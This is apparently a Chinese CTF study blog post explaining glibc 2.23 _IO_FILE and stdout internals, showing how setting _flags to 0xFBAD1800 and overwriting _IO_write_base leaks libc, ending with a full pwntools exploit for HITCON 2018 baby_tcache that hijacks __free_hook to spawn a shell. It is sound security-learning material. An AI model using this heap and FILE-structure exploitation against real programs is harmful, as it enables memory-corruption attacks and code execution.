study
0%

io_file之stdout

发表于

IO_file学习(基于2.23源码学习)

io_file是一个描述有关io操作的文件结构体,当有输出和输出函数时会用到这个结构体,其代码如下

1
2
3
4
5
6
7
8
9
10
/* We always allocate an extra word following an _IO_FILE.
   This contains a pointer to the function jump table used.
   This is for compatibility with C++ streambuf; the word can
   be used to smash to a pointer to a virtual function table. */

struct _IO_FILE_plus
{
  _IO_FILE file;
  const struct _IO_jump_t *vtable;
};

结构体一共有两个变量,file和vtable,其中file记录着一些数据,vtable储存着各种各样的函数指针,也叫虚表

file源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
struct _IO_FILE {
  int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */
#define _IO_file_flags _flags

  /* The following pointers correspond to the C++ streambuf protocol. */
  /* Note:  Tk uses the _IO_read_ptr and _IO_read_end fields directly. */
  char* _IO_read_ptr;	/* Current read pointer */
  char* _IO_read_end;	/* End of get area. */
  char* _IO_read_base;	/* Start of putback+get area. */
  char* _IO_write_base;	/* Start of put area. */
  char* _IO_write_ptr;	/* Current put pointer. */
  char* _IO_write_end;	/* End of put area. */
  char* _IO_buf_base;	/* Start of reserve area. */
  char* _IO_buf_end;	/* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
#if 0
  int _blksize;
#else
  int _flags2;
#endif
  _IO_off_t _old_offset; /* This used to be _offset but it's too small.  */

#define __HAVE_COLUMN /* temporary */
  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  /*  char* _save_gptr;  char* _save_egptr; */

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

可见里面记录着各种各样的数据,其中和pwn题相关的也就几个变量

vtable源码

在 libc2.23 版本下,32 位的 vtable 相对io_file_plus偏移为 0x94,64 位偏移为 0xd8

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
struct _IO_jump_t
{
    JUMP_FIELD(size_t, __dummy);
    JUMP_FIELD(size_t, __dummy2);
    JUMP_FIELD(_IO_finish_t, __finish);
    JUMP_FIELD(_IO_overflow_t, __overflow);
    JUMP_FIELD(_IO_underflow_t, __underflow);
    JUMP_FIELD(_IO_underflow_t, __uflow);
    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
    /* showmany */
    JUMP_FIELD(_IO_xsputn_t, __xsputn);
    JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
    JUMP_FIELD(_IO_seekoff_t, __seekoff);
    JUMP_FIELD(_IO_seekpos_t, __seekpos);
    JUMP_FIELD(_IO_setbuf_t, __setbuf);
    JUMP_FIELD(_IO_sync_t, __sync);
    JUMP_FIELD(_IO_doallocate_t, __doallocate);
    JUMP_FIELD(_IO_read_t, __read);
    JUMP_FIELD(_IO_write_t, __write);
    JUMP_FIELD(_IO_seek_t, __seek);
    JUMP_FIELD(_IO_close_t, __close);
    JUMP_FIELD(_IO_stat_t, __stat);
    JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
    JUMP_FIELD(_IO_imbue_t, __imbue);
#if 0
    get_column;
    set_column;
#endif
};

每个程序启动时一般都有三个文件流是自动打开的:stdout,stdin,stderr,每个六都对应一个这个结构体,这三个结构体通过链表的形式组织,通过变量_chain链接,如图

image-20220111192200386

这三个结构体都储存在libc.so的数据段

io_file之_flag

_flag是io_file的第一个变量,他的高两位是由libc决定的,所以不同的libc会有不同的差异,ubuntu16即2.23的前两位是flags = 0xfbad0000,前两位标识这个流是什么文件,低两位字节则标识程序的执行状态,glibc专门宏定义了一些常量,每个常量记录一个执行状态。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#define _IO_MAGIC 0xFBAD0000 /* Magic number */
#define _OLD_STDIO_MAGIC 0xFABC0000 /* Emulate old stdio. */
#define _IO_MAGIC_MASK 0xFFFF0000
#define _IO_USER_BUF 1 /* User owns buffer; don't delete it on close. */
#define _IO_UNBUFFERED 2
#define _IO_NO_READS 4 /* Reading not allowed */
#define _IO_NO_WRITES 8 /* Writing not allowd */
#define _IO_EOF_SEEN 0x10
#define _IO_ERR_SEEN 0x20
#define _IO_DELETE_DONT_CLOSE 0x40 /* Don't call close(_fileno) on cleanup. */
#define _IO_LINKED 0x80 /* Set if linked (using _chain) to streambuf::_list_all.*/
#define _IO_IN_BACKUP 0x100
#define _IO_LINE_BUF 0x200
#define _IO_TIED_PUT_GET 0x400 /* Set if put and get pointer logicly tied. */
#define _IO_CURRENTLY_PUTTING 0x800
#define _IO_IS_APPENDING 0x1000
#define _IO_IS_FILEBUF 0x2000
#define _IO_BAD_SEEN 0x4000
#define _IO_USER_LOCK 0x8000

要判断flag是什么状态就直接与这些常量按位与运算。

puts函数执行流程

puts函数会调用_IO_puts函数,这个函数才完成puts函数的功能,下面是源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include "libioP.h"
#include <string.h>
#include <limits.h>
int
_IO_puts (const char *str)
{
  int result = EOF;
  _IO_size_t len = strlen (str);
  _IO_acquire_lock (_IO_stdout);

  if ((_IO_vtable_offset (_IO_stdout) != 0
       || _IO_fwide (_IO_stdout, -1) == -1)
      && _IO_sputn (_IO_stdout, str, len) == len
      && _IO_putc_unlocked ('\n', _IO_stdout) != EOF)
    result = MIN (INT_MAX, len + 1);

  _IO_release_lock (_IO_stdout);
  return result;
}

源代码引入了libioP.h库,在代码中使用了_IO_sputn宏,这个宏是 _IO_stdout 的虚表vtable指向的 _xsputn,这里储存着_IO_new_file_xsputn地址,也就是调用了这个函数。

然后这个函数又会调用(如果目标输出数据还有剩余的话)就会通过vtable调用_IO_new_file_overflow,下面是 _IO_new_file_overflow的源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
_IO_new_file_overflow (_IO_FILE *f, int ch)
{
  if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
    {
      f->_flags |= _IO_ERR_SEEN;
      __set_errno (EBADF);
      return EOF;
    }
  /* If currently reading or no buffer allocated. */
  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)
    {
      /* Allocate a buffer if needed. */
      if (f->_IO_write_base == NULL)
	{
	  _IO_doallocbuf (f);
	  _IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
	}
      /* Otherwise must be currently reading.
	 If _IO_read_ptr (and hence also _IO_read_end) is at the buffer end,
	 logically slide the buffer forwards one block (by setting the
	 read pointers to all point at the beginning of the block).  This
	 makes room for subsequent output.
	 Otherwise, set the read pointers to _IO_read_end (leaving that
	 alone, so it can continue to correspond to the external position). */
      if (__glibc_unlikely (_IO_in_backup (f)))
	{
	  size_t nbackup = f->_IO_read_end - f->_IO_read_ptr;
	  _IO_free_backup_area (f);
	  f->_IO_read_base -= MIN (nbackup,
				   f->_IO_read_base - f->_IO_buf_base);
	  f->_IO_read_ptr = f->_IO_read_base;
	}

      if (f->_IO_read_ptr == f->_IO_buf_end)
	f->_IO_read_end = f->_IO_read_ptr = f->_IO_buf_base;
      f->_IO_write_ptr = f->_IO_read_ptr;
      f->_IO_write_base = f->_IO_write_ptr;
      f->_IO_write_end = f->_IO_buf_end;
      f->_IO_read_base = f->_IO_read_ptr = f->_IO_read_end;

      f->_flags |= _IO_CURRENTLY_PUTTING;
      if (f->_mode <= 0 && f->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
	f->_IO_write_end = f->_IO_write_ptr;
    }
  if (ch == EOF)
    return _IO_do_write (f, f->_IO_write_base,
			 f->_IO_write_ptr - f->_IO_write_base);
  if (f->_IO_write_ptr == f->_IO_buf_end ) /* Buffer is really full */
    if (_IO_do_flush (f) == EOF)
      return EOF;
  *f->_IO_write_ptr++ = ch;
  if ((f->_flags & _IO_UNBUFFERED)
      || ((f->_flags & _IO_LINE_BUF) && ch == '\n'))
    if (_IO_do_write (f, f->_IO_write_base,
		      f->_IO_write_ptr - f->_IO_write_base) == EOF)
      return EOF;
  return (unsigned char) ch;
}

其中就调用了 _io_do_write函数,这个函数是系统调用第一个参数是文件流f,第二个参数是输出的起始地址f->_IO_write_base,第三个输出长度f->_IO_write_ptr - f->_IO_write_base,如果事先能够控制io_write_base,那么就能任一地址读了,也就可以leak出libc的地址了。

那么现在就有两个目标要完成,一个是控制io_write_base的地址,第二个是在IO_new_file_overflow函数中如何绕过条件调用io_do_write

绕过_IO_new_file_overflow函数的检查

进入_IO_new_file_overflow函数后会直接用flag与_IO_NO_WRITES常量做与运算,如果结果为真就会报错退出程序,代码如下

1
2
3
4
5
6
if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
  {
    f->_flags |= _IO_ERR_SEEN;
    __set_errno (EBADF);
    return EOF;
  }

要让程序运行下去执行io_do_write就得绕过这个if,让条件为假,这个_IO_NO_WRITES是一个io_file定义的常量,让flag的倒数第四位为0就能保证条件判断为假了,_flags = 0xfbad0000就行

1
#define _IO_NO_WRITES 8 /* Writing not allowd */

第二个检查代码如下

1
if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)

条件是检查输出缓存区是否为空,如果为空就进入分支然后分配空间,并且会初始化指针,也包括重置f->_IO_write_base指针,这样的话就算原先布置了f->_IO_write_base指针也会被覆盖,从而无法任意地址写,所以这个条件也得判断为假,这个条件是两个条件或起来的,两个条件都为假才行,f->_IO_write_base == NULL肯定为假,所以通过布置让f->_flags & _IO_CURRENTLY_PUTTING为假就好。

_IO_CURRENTLY_PUTTING常量还是io_file定义的,

1
#define _IO_CURRENTLY_PUTTING 0x800

要使f->_flags & _IO_CURRENTLY_PUTTING为1,flag=0xfbad0800就能实现,这个flag还能绕过一个检查

绕过这两个检查就能顺利进入io_do_wirte函数了,进入这个函数后又会进入io_new_do_write函数,

io_new_do_write函数又会调用new_do_write函数,这个函数最终调用系统调用write函数,前面的函数没啥检查,最后new_do_write还有一些检查,查看源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
IO_size_t
new_do_write (_IO_FILE *fp, const char *data, _IO_size_t to_do)
{
  _IO_size_t count;
  if (fp->_flags & _IO_IS_APPENDING)
    /* On a system without a proper O_APPEND implementation,
       you would need to sys_seek(0, SEEK_END) here, but is
       not needed nor desirable for Unix- or Posix-like systems.
       Instead, just indicate that offset (before and after) is
       unpredictable. */
    fp->_offset = _IO_pos_BAD;
  else if (fp->_IO_read_end != fp->_IO_write_base)
    {
      _IO_off64_t new_pos
	= _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
      if (new_pos == _IO_pos_BAD)
	return 0;
      fp->_offset = new_pos;
    }
  count = _IO_SYSWRITE (fp, data, to_do);
  if (fp->_cur_column && count)
    fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;
  _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;
  fp->_IO_write_end = (fp->_mode <= 0
		       && (fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
		       ? fp->_IO_buf_base : fp->_IO_buf_end);
  return count;
}

首先会执行一个If分支和一个else if分支,看elseif分支的条件,fp->_IO_read_end != fp->_IO_write_base这个大概率是不相等的,这个分支是不建议进入的,网上有各种原因就不赘述了,要想不进入这个分支那就只能进入If分支了,if分支的条件是fp->_flags & _IO_IS_APPENDING

1
#define _IO_IS_APPENDING 0x1000

只要设置flag=0xFBAD1800就行了。

劫持stdout

据我所知就是爆破,爆破后十六位伪造fd申请stdout.

和houseofroman手法十分类似,其实这种没有leak的题也可以直接houseofroman直接做,不过就是成功率太低了(要爆两次,第二次爆破范围还挺大)。

总结

要利用stdout只要申请到stdout(看脸)然后设置好flag=0xFBAD1800和write_base就好了。

例题 HITCON 2018 PWN baby_tcache

没有show函数,就像前面总结的步骤一步步完成就行(因为脸黑关掉了aslr)

脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
from pwn import *
context.log_level='debug'
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
ogg=[0x4f3d5,0x4f432,0x10a41c]
sh=process('./baby_tcache')
#gdb.attach(sh,'b main')
def  add(size,data):
    sh.recvuntil('Your choice: ')
    sh.sendline('1')
    sh.recvuntil('Size:')
    sh.sendline(str(size))
    sh.recvuntil('Data:')
    sh.send(data)

def delete(index):
    sh.recvuntil('Your choice: ')
    sh.sendline('2')
    sh.recvuntil('Index:')
    sh.sendline(str(index))

add(0x508-0x10,'aaa')#0
add(0x50,'aaa')#1
add(0x60,'aaa')#2
add(0x70,'aaa')#3
add(0x80,'aaaa')#4
add(0x500-0x8,'cccc')#5
add(0x50,'aaaa')#6
delete(4)
add(0x88,'s'*0x80+'\xe0\x06')
delete(2)
delete(0)
delete(5)
add(0x550,'/bin/sh\x00')#0
delete(4)
gdb.attach(sh)
add(0x70+0x80-0x10,'\x60\xe7')
add(0x68,'a')
add(0x60, p64(0xfbad1800)+p64(0)*3+'\x00')
info=sh.recvuntil('\x7f')[-6:].ljust(8,'\x00')
libc.address=u64(info)-0x3ed8b0
print hex(libc.address)
free_hook=libc.symbols['__free_hook']
add(0x100,p64(free_hook))
add(0x80,'a')
add(0x80,p64(libc.address+ogg[1]))
delete(0)
sh.interactive()